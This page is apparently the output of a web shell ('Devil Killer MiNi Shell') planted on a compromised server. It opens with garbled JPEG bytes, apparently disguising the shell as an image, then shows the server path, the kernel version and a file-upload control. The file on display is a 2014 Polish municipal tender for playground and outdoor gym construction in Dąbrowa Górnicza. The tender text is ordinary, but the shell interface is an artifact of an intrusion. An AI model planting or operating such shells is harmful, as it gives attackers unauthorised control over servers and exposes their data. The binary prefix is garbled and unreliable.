JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140728/251848-N-2014.html

<p class="kh_header"><b>Dąbrowa Górnicza: Zadanie A:
 Dębowa Kraina - rewitalizacja placu zabaw przy ul. Legionów Polskich w otoczeniu bloków 109,111,113,115.Przestrzeń wspólna - strefy  integracji społecznej w Dąbrowie Górniczej.

Zadanie B: 
Plac zabaw pod szkolnym dębem - Przestrzeń wspólna-strefy integracji społecznej w Dąbrowie Górniczej.

Zadanie C: 
Nowy plac zabaw Orzeszkowej 4 Reden. Przestrzeń wspólna strefy integracji społecznej w Dąbrowie Górniczej.

Zadanie D:
Sport na luzie

Zadanie E:
Zagospodarowanie terenu na stadionie sportowym przy ul. Olimpijskiej</b><br>
<b>Numer ogłoszenia: 251848 - 2014; data zamieszczenia: 28.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie A:
 Dębowa Kraina - rewitalizacja placu zabaw przy ul. Legionów Polskich w otoczeniu bloków 109,111,113,115.Przestrzeń wspólna - strefy  integracji społecznej w Dąbrowie Górniczej.

Zadanie B: 
Plac zabaw pod szkolnym dębem - Przestrzeń wspólna-strefy integracji społecznej w Dąbrowie Górniczej.

Zadanie C: 
Nowy plac zabaw Orzeszkowej 4 Reden. Przestrzeń wspólna strefy integracji społecznej w Dąbrowie Górniczej.

Zadanie D:
Sport na luzie

Zadanie E:
Zagospodarowanie terenu na stadionie sportowym przy ul. Olimpijskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Zadanie A. Dębowa Kraina - rewitalizacja placu zabaw przy ul. Legionów Polskich w otoczeniu bloków 109,111,113,115.Przestrzeń wspólna - strefy  integracji społecznej w Dąbrowie Górniczej
1.	Przedmiot  zamówienia  polega na zabudowaniu dostarczonych metalowych urządzeń zabawowych, ławo- stołu, stolika do  gry w szachy i chińczyka wymienionych w przedmiarze robót (zał. nr 9 do SIWZ), ich transport do miejsca montażu oraz montaż przedmiotowych urządzeń w miejscu wskazanym przez Zamawiającego tj. przy ul. Legionów Polskich  w Dąbrowie Górniczej.
2.	Nowozamontowane urządzenia zabawowe maja zostać ogrodzone ogrodzeniem metalowym panelowym, na pozostałej części nie ogrodzonej ma być położona kostka brukowa betonowa zgodnie z przedmiarem robót (zał. nr 9 do SIWZ).  
3.	Przykładowa wizualizacja wraz z opisem funkcji urządzeń zabawowych wymaganych przez Zamawiającego znajduje się w zał. nr 7A do SIWZ.
4.	Wszystkie dostarczone i zamontowane elementy metalowych urządzeń zabawowych winny posiadać stosowne certyfikaty zgodności z normami PN-EN 1176 lub dokumenty równoważne uprawniające do oznaczania wyrobów znakami bezpieczeństwa na pojedyncze urządzenia zabawowe (z wyjątkiem elementów nie podlegających certyfikacji: ławki, regulamin placów zabaw, ogrodzenia itp.) oraz w przypadku złożonych zestawów zabawowych certyfikaty na całe modułowe zestawy zabawowe wydane przez instytucje uprawnione do procesu certyfikacji.
5.	Poszczególne elementy urządzeń zabawowych powinny być wykonane ze stali cynkowanej ogniowo i  malowanej proszkowo,  elementy pełne i wypełniające z  płyty polietylenowej HDPE.  
6.	Wszystkie urządzenia stanowiące przedmiot zamówienia muszą spełniać wymogi bezpieczeństwa i ergonomii oraz muszą być zgodne z wymaganiami określonymi w przepisach BHP oraz pozostałych przepisach prawa.

II. Zadanie B. Plac zabaw pod szkolnym dębem - Przestrzeń wspólna-strefy integracji społecznej w Dąbrowie Górniczej
1.	Przedmiot  zamówienia  polega na zabudowaniu dostarczonych metalowych urządzeń zabawowych oraz na zabudowaniu metalowych podwójnych urządzeń sportowych przeznaczonych do ćwiczeń na wolnym powietrzu wymienionych w przedmiarze robót (zał. nr 9 do SIWZ), ich transport do miejsca montażu oraz montaż przedmiotowych urządzeń w miejscu wskazanym przez Zamawiającego tj. przy ul. Konopnickiej w Dąbrowie Górniczej.  
2.	Nowozamontowane urządzenia zabawowe maja zostać ogrodzone ogrodzeniem metalowym panelowym i oddzielone od strony boiska piłkochwytami zgodnie z przedmiarem robót (zał. nr 9 do SIWZ).  Natomiast  pod piramidę, urządzenia zabawowe oraz urządzenia sportowe należy wykonać podbudowy zgodnie z przedmiarem  robót (zał. nr 9 do SIWZ).
3.	Przykładowa wizualizacja wraz z opisem funkcji urządzeń zabawowych i sportowych wymaganych przez Zamawiającego znajduje się w zał. nr 7B do SIWZ.
4.	Wszystkie dostarczone i zamontowane elementy metalowych urządzeń zabawowych winny posiadać stosowne certyfikaty zgodności z normami PN-EN 1176 lub dokumenty równoważne uprawniające do oznaczania wyrobów znakami bezpieczeństwa na pojedyncze urządzenia zabawowe (z wyjątkiem elementów nie podlegających certyfikacji: ławki, regulamin placów zabaw, ogrodzenia itp.) oraz w przypadku złożonych zestawów zabawowych certyfikaty na całe modułowe zestawy zabawowe wydane przez instytucje uprawnione do procesu certyfikacji.
5.	Wszystkie dostarczone i zamontowane urządzenia sportowe przeznaczone do ćwiczeń na wolnym powietrzu winny posiadać stosowane certyfikaty zgodności z normami PN-EN 1176 oraz PN-EN 957 lub dokumenty równoważne.
6.	Poszczególne elementy urządzeń zabawowych powinny być wykonane ze stali cynkowanej ogniowo i  malowanej proszkowo,  elementy pełne i wypełniające z  płyty polietylenowej HDPE.  
7.	Urządzenia sportowe winny być wykonane ze stali malowanej proszkowo na kolor srebrno - żółty. Elementy narażone na zużycie typu stopki, siedziska winny być wykonane ze stali nierdzewnej odpornej na warunki atmosferyczne oraz zadrapania. 
8.	Wszystkie urządzenia stanowiące przedmiot zamówienia muszą spełniać wymogi bezpieczeństwa i ergonomii oraz muszą być zgodne z wymaganiami określonymi w przepisach BHP oraz pozostałych przepisach prawa.
9.	Wszystkie urządzenia sportowe winny posiadać ograniczniki, które uniemożliwiają nadmierne wychylenie elementów wahających się powyżej 50 stopni, co ma na celu zapobiegać niebezpiecznym uderzeniom. Elementy swobodnie opadające w prasach w celu zredukowania siły zderzenia elementów winny mieć zastosowane amortyzatory.
10.	Każde urządzenie sportowe winno być urządzeniem modułowym tj. pozwalającym na zastosowanie dowolnej konfiguracji dwóch stanowisk do ćwiczeń po obu stronach pylona. 
11.	Każde urządzenie sportowe winno być wyposażone w tablice znamionową zamontowaną w centralnej części pylonu, z funkcjami i instrukcją do ćwiczeń. 
12.	Zamawiający wymaga zamontowania Regulaminu korzystania z siłowni zewnętrznych (przykładowa wizualizacja wraz z opisem  znajduje się w zał. nr 7B do SIWZ).


III. Zadanie C. Nowy plac zabaw Orzeszkowej 4 Reden. Przestrzeń wspólna strefy integracji społecznej w Dąbrowie Górniczej
1.	Przedmiot  zamówienia  polega na zabudowaniu dostarczonych metalowych urządzeń zabawowych wymienionych w przedmiarze robót (zał. nr 9 do SIWZ), ich transport do miejsca montażu oraz montaż przedmiotowych urządzeń w miejscu wskazanym przez Zamawiającego tj. przy ul. Orzeszkowej nr 4  w Dąbrowie Górniczej oraz wykonanie nawierzchni pod urządzeniami zabawowymi zgodnie z przedmiarem robót  (zał. nr 9 do SIWZ).
2.	Przykładowa wizualizacja wraz z opisem funkcji urządzeń zabawowych wymaganych przez Zamawiającego znajduje się w zał. nr 7C do SIWZ.
3.	Wszystkie dostarczone i zamontowane elementy metalowych urządzeń zabawowych winny posiadać stosowne certyfikaty zgodności z normami PN-EN 1176 lub dokumenty równoważne uprawniające do oznaczania wyrobów znakami bezpieczeństwa na pojedyncze urządzenia zabawowe (z wyjątkiem elementów nie podlegających certyfikacji: ławki, regulamin placów zabaw, ogrodzenia itp.) oraz w przypadku złożonych zestawów zabawowych certyfikaty na całe modułowe zestawy zabawowe wydane przez instytucje uprawnione do procesu certyfikacji.
4.	Poszczególne elementy urządzeń zabawowych powinny być wykonane ze stali cynkowanej ogniowo i  malowanej proszkowo,  elementy pełne i wypełniające z  płyty polietylenowej HDPE.  
5.	Wszystkie urządzenia stanowiące przedmiot zamówienia muszą spełniać wymogi bezpieczeństwa i ergonomii oraz muszą być zgodne z wymaganiami określonymi w przepisach BHP oraz pozostałych przepisach prawa.

IV. Zadanie D. Sport na luzie
1.	Przedmiot  zamówienia  polega na zabudowaniu dostarczonych metalowych urządzeń zabawowych oraz na zabudowaniu dostarczonych metalowych podwójnych urządzeń sportowych przeznaczonych do ćwiczeń na wolnym powietrzu wymienionych w przedmiarze robót (zał. nr 9 do SIWZ), ich transport do miejsca montażu oraz montaż przedmiotowych urządzeń w miejscu wskazanym przez Zamawiającego tj. przy ul. Ofiar Katynia 78 w Dąbrowie Górniczej.
2.	Nowozamontowane urządzenia zabawowe maja zostać ogrodzone  ogrodzeniem metalowym panelowym. Należy także wykonać podbudowę pod urządzeniami zabawowymi i podbudowę z kostki brukowej betonowej pod urządzeniami sportowymi zgodnie z przedmiarem robót  (zał. nr 9 do SIWZ).
3.	Przykładowa wizualizacja wraz z opisem funkcji urządzeń zabawowych i sportowych wymaganych przez Zamawiającego znajduje się w zał. nr 7D do SIWZ.
4.	Wszystkie dostarczone i zamontowane elementy metalowych urządzeń zabawowych winny posiadać stosowne certyfikaty zgodności z normami PN-EN 1176 lub dokumenty równoważne uprawniające do oznaczania wyrobów znakami bezpieczeństwa na pojedyncze urządzenia zabawowe (z wyjątkiem elementów nie podlegających certyfikacji: ławki, regulamin placów zabaw, ogrodzenia itp.) oraz w przypadku złożonych zestawów zabawowych certyfikaty na całe modułowe zestawy zabawowe wydane przez instytucje uprawnione do procesu certyfikacji.
5.	Wszystkie dostarczone i zamontowane urządzenia sportowe przeznaczone do ćwiczeń na wolnym powietrzu winny posiadać stosowane certyfikaty zgodności z normami PN-EN 1176 oraz PN-EN 957 lub dokumenty równoważne.
6.	Poszczególne elementy urządzeń zabawowych powinny być wykonane ze stali cynkowanej ogniowo i  malowanej proszkowo,  elementy pełne i wypełniające z  płyty polietylenowej HDPE.  
7.	Urządzenia sportowe winny być wykonane ze stali malowanej proszkowo na kolor srebrno - żółty. Elementy narażone na zużycie typu stopki, siedziska winny być wykonane ze stali nierdzewnej odpornej na warunki atmosferyczne oraz zadrapania. 
8.	Wszystkie urządzenia stanowiące przedmiot zamówienia muszą spełniać wymogi bezpieczeństwa i ergonomii oraz muszą być zgodne z wymaganiami określonymi w przepisach BHP oraz pozostałych przepisach prawa.
9.	Wszystkie urządzenia sportowe winny posiadać ograniczniki, które uniemożliwiają nadmierne wychylenie elementów wahających się powyżej 50 stopni, co ma na celu zapobiegać niebezpiecznym uderzeniom. Elementy swobodnie opadające w prasach w celu zredukowania siły zderzenia elementów winny mieć zastosowane amortyzatory.
10.	Każde urządzenie sportowe winno być urządzeniem modułowym tj. pozwalającym na zastosowanie dowolnej konfiguracji dwóch stanowisk do ćwiczeń po obu stronach pylona. 
11.	Każde urządzenie sportowe winno być wyposażone w tablice znamionową zamontowaną w centralnej części pylonu, z funkcjami i instrukcją do ćwiczeń. 
12.	Zamawiający wymaga zamontowania Regulaminu korzystania z siłowni zewnętrznych (przykładowa wizualizacja wraz z opisem  znajduje się w zał. nr 7D do SIWZ).

V. Zadanie E. Zagospodarowanie terenu na stadionie sportowym przy ul. Olimpijskiej
1.	Przedmiot  zamówienia  polega na zabudowaniu dostarczonych przez Wykonawcę metalowych urządzeń zabawowych wymienionych w przedmiarze robót (zał. nr 9 do SIWZ), ich transport do miejsca montażu oraz montaż przedmiotowych urządzeń w miejscu wskazanym przez Zamawiającego tj. przy ul. Olimpijskiej (stadion Ujejsce)  w Dąbrowie Górniczej.
2.	Nowozabudowany plac zabaw zostanie ogrodzony ogrodzeniem metalowym panelowym i oddzielony piłkochwytem od strony boiska zgodnie z przedmiarem robót (zał. nr 9 do SIWZ) oraz  dostawa i montaż  trybun wraz z siedziskami i  podbudową ciągu komunikacyjnego z kostki brukowej betonowej zgodnie z przedmiarem robót  (zał. nr 9 do SIWZ).
3.	Przykładowa wizualizacja wraz z opisem funkcji urządzeń zabawowych wymaganych przez Zamawiającego znajduje się w zał. nr 7E do SIWZ.
4.	Wszystkie dostarczone i zamontowane elementy metalowych urządzeń zabawowych winny posiadać stosowne certyfikaty zgodności z normami PN-EN 1176 lub dokumenty równoważne uprawniające do oznaczania wyrobów znakami bezpieczeństwa na pojedyncze urządzenia zabawowe (z wyjątkiem elementów nie podlegających certyfikacji: ławki, regulamin placów zabaw, ogrodzenia itp.) oraz w przypadku złożonych zestawów zabawowych certyfikaty na całe modułowe zestawy zabawowe wydane przez instytucje uprawnione do procesu certyfikacji.
5.	Poszczególne elementy urządzeń zabawowych powinny być wykonane ze stali cynkowanej ogniowo i  malowanej proszkowo,  elementy pełne i wypełniające z  płyty polietylenowej HDPE.  
6.	Wszystkie urządzenia stanowiące przedmiot zamówienia muszą spełniać wymogi bezpieczeństwa i ergonomii oraz muszą być zgodne z wymaganiami określonymi w przepisach BHP oraz pozostałych przepisach prawa.

VI. Wymagania ogólne (dot. zadania  A, zadania B,  zadania  C,  zadania  D, zadania E)
1.	Wykonawca jest odpowiedzialny za prowadzenie prac zgodnie z wszelkimi niezbędnymi przepisami, obowiązującymi normami oraz zasadami współczesnej wiedzy technicznej zapewniając bezpieczne i higieniczne warunki pracy. Jednocześnie winien przestrzegać warunków umowy oraz odpowiada za jakość zastosowanych materiałów i wykonywanych robót i za ich zgodność z dokumentacją.
2.	Wykonawca winien udzielić 36 miesięcy gwarancji jakości na  zrealizowany przedmiot zamówienia liczony od daty podpisania przez obie strony protokołu odbioru końcowego. 
3.	Po zakończeniu prac Wykonawca winien uporządkować teren i zutylizować wszelkie wytworzone odpady.
4.	W przypadku zatrudnienia przez Wykonawcę personelu obcojęzycznego, Wykonawca zapewni ciągłą możliwość porozumiewania się personelu Zamawiającego z personelem Wykonawcy w języku polskim.
5.	Roboty należy zrealizować na podstawie ;
-  Przedmiarów robót 
-  Specyfikacji  Technicznej Wykonania i Odbioru Robót
- wymogów  Specyfikacji Istotnych Warunków Zamówienia  wraz z projektem umowy,
- zasad wiedzy technicznej , sztuki budowlanej  i przepisów prawa     
6.	Zamówienie musi  być realizowane  zgodnie z:
1.Ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2013 r., poz. 1409 z późn. zm.);
2.Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (Dz. U. z 2003r., Nr 169, poz. 1650 z późn. zm.).
7.	W ramach każdego zadnia Wykonawca winien posiadać ubezpieczenia od odpowiedzialności cywilnej w
zakresie prowadzonej działalności, na wartość co najmniej 30 000,00 zł (słownie: trzydziestu tysięcy złotych), obowiązujące w całym okresie realizacji zamówienia. Wykonawca zobowiązany jest do przedłożenia kopii polisy OC lub innego dokumentu w terminie do 3 dni od dnia podpisania umowy. W przypadku gdy Wykonawca będzie realizował więcej niż jedno zadanie Zamawiający dopuszcza przedłożenie jednej polisy OC/dokumentu  odpowiadającej sumie wartości polis OC/dokumentu wymaganych na każde zadanie lub przedłożenie odrębnych polis OC/dokumentu na każde zadanie.
8.	Rozwiązania  równoważne :
Wskazane w SIWZ znaki towarowe, normy, patenty i miejsce pochodzenia są uzasadnione specyfiką przedmiotu zamówienia i mają na celu wskazanie jedynie jakości i parametrów przedmiotu zamówienia z uwagi na brak innych dostatecznie dokładnych określeń, które pozwalałyby opisać przedmiot zamówienia w tej części w sposób jednoznaczny i wyczerpujący. W związku z powyższym Wykonawcy mogą składać oferty równoważne w stosunku do przedmiotu zamówienia przedstawionego w SIWZ - zgodnie z art. 30 ust. 4 i 5 Ustawy. W związku z tym :
1.Zamawiający dopuszcza zastosowanie materiałów i urządzeń równoważnych - tj. o parametrach technicznych i jakościowych nie gorszych niż określone w SIWZ - w odniesieniu do materiałów i urządzeń, których pochodzenie zostało określone przez Zamawiającego w SIWZ nazwą producenta.
2.Zgodnie z art. 30 ust. 5 Ustawy Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez zamawiającego. Równoważność pod względem parametrów technicznych, użytkowych oraz eksploatacyjnych ma w szczególności gwarantować realizację zadania w zgodzie z dokumentacją techniczną oraz zapewnić uzyskanie parametrów technicznych nie gorszych od założonych w SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 34.92.82.00-0, 37.41.00.00-5, 45.34.00.00-2, 45.23.32.00-1, 45.11.27.23-9, 39.11.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. zadania A, zadania B, zadania C, zadania D, zadania E,Zamawiający
nie stawia szczegółowego warunku w tym zakresie. Wykonawca potwierdza
spełnianie warunku poprzez złożenie oświadczenia o spełnieniu wymagań
określonych w art. 22 ust. 1 ustawy (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. zadania A, zadania B, zadania C, zadania D, zadania  E.
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończył:
- dot. zadania B, D 
min. 1 robotę budowlaną o wartości min. 35.000,00 zł brutto obejmującą swym zakresem dostawę i montaż urządzeń zabawowych i sportowych.
Jeżeli Wykonawca składa ofertę na dwa lub więcej zadań za spełnienie warunku jw. uznana zostanie odpowiednio realizacja  jednego zadania jw.  

- dot. zadania A, C, E,
min. 1 robotę budowlaną o wartości min. 35.000,00 zł brutto obejmującą swym zakresem dostawę i montaż urządzeń zabawowych.
Jeżeli Wykonawca składa ofertę na dwa lub więcej zadań za spełnienie warunku jw. uznana zostanie odpowiednio realizacja  jednego zadania jw.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. zadania A, zadania B, zadania C, zadania D, zadania  E.
Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1 ustawy (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. zadania A, zadania B, zadania C, zadania D, zadania  E.
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje min. jedną osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej bez ograniczeń zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie ( Dz. U z 2006, Nr 83 poz 578 z pozn. zm.) lub odpowiadające im ważne uprawnienia budowlane .  
Jeżeli Wykonawca składa ofertę na dwa lub więcej zadań za spełnienie warunku jw. uznane zostanie dysponowanie jedną osobą posiadającą wymagane uprawnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. zadania A, zadania B, zadania C, zadania D, zadania  E, zadania  F.
Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1 ustawy (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez Wykonawcę w wykazie oraz złożenia dowodów dotyczy
robót budowlanych pozwalających wykazać, iż Wykonawca spełnia warunek określony
w pkt. III.3.2. ogłoszenia. W wykazie nie należy podawać informacji o robotach
budowlanych niewykonanych lub wykonanych nienależycie - Zamawiający nie ocenia
zdolności Wykonawcy do należytego wykonania zamówienia na podstawie art. 22 ust. 5
Ustawy (zdanie 2);</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

